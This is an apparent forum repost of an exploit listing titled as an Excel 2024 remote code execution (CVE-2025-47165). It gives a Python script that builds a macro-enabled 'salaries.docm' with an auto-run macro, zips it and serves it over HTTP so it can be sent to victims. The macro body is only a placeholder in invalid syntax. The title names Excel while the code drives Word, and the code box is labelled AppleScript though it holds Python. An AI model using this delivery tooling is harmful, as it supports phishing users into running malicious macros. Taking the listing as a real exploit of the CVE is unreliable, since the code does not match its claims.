Microsoft Excel 2024 - 远程代码执行 (CVE-2025-47165)

90_

攻击者可以通过电子邮件或流媒体服务器发送恶意 DOCM 文件，诱骗任何用户打开并执行其代码。

[AppleScript] 纯文本查看 复制代码

#!/usr/bin/python

import os
import sys
import pythoncom
from win32com.client import Dispatch
import http.server
import socketserver
import socket
import threading
import zipfile

PORT = 8000
DOCM_FILENAME = "salaries.docm"
ZIP_FILENAME = "salaries.zip"
DIRECTORY = "."

def create_docm_with_macro(filename=DOCM_FILENAME):
    pythoncom.CoInitialize()
    word = Dispatch("Word.Application")
    word.Visible = False

    try:
        doc = word.Documents.Add()
        vb_project = doc.VBProject
        vb_component = vb_project.VBComponents("ThisDocument")

        macro_code = '''
Sub AutoOpen()
      //YOUR EXPLOIT HERE
      // All OF YPU PLEASE WATCH THE DEMO VIDEO
      // Best Regards to packetstorm.news and OFFSEC
End Sub
'''

        vb_component.CodeModule.AddFromString(macro_code)

        doc.SaveAs(os.path.abspath(filename), FileFormat=13)
        print(f"[+] Macro-enabled Word document created: {filename}")

    except Exception as e:
        print(f"[!] Error creating document: {e}")
    finally:
        doc.Close(False)
        word.Quit()
        pythoncom.CoUninitialize()

def zip_docm(docm_path, zip_path):
    with zipfile.ZipFile(zip_path, 'w', compression=zipfile.ZIP_DEFLATED)
as zipf:
        zipf.write(docm_path, arcname=os.path.basename(docm_path))
    print(f"[+] Created ZIP archive: {zip_path}")

def get_local_ip():
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.connect(("8.8.8.8", 80))
        ip = s.getsockname()[0]
    except Exception:
        ip = "127.0.0.1"
    finally:
        s.close()
    return ip

class Handler(http.server.SimpleHTTPRequestHandler):
    def __init__(self, *args, **kwargs):
        super().__init__(*args, directory=DIRECTORY, **kwargs)

def run_server():
    ip = get_local_ip()
    print(f"[+] Starting HTTP server on http://{ip}:{PORT}")
    print(f"[+] Place your macro docm and zip files in this directory to
serve them.")
    print(f"[+] Access the ZIP file at: http://{ip}:{PORT}/{ZIP_FILENAME}")
    with socketserver.TCPServer(("", PORT), Handler) as httpd:
        print("[+] Server running, press Ctrl+C to stop")
        httpd.serve_forever()

if __name__ == "__main__":
    if os.name != "nt":
        print("[!] This script only runs on Windows with MS Word
installed.")
        sys.exit(1)

    print("[*] Creating the macro-enabled document...")
    create_docm_with_macro(DOCM_FILENAME)

    print("[*] Creating ZIP archive of the document...")
    zip_docm(DOCM_FILENAME, ZIP_FILENAME)

    print("[*] Starting HTTP server in background thread...")
    server_thread = threading.Thread(target=run_server, daemon=True)
    server_thread.start()

    try:
        while True:
            pass  # Keep main thread alive
    except KeyboardInterrupt:
        print("\n[!] Server stopped by user.")


```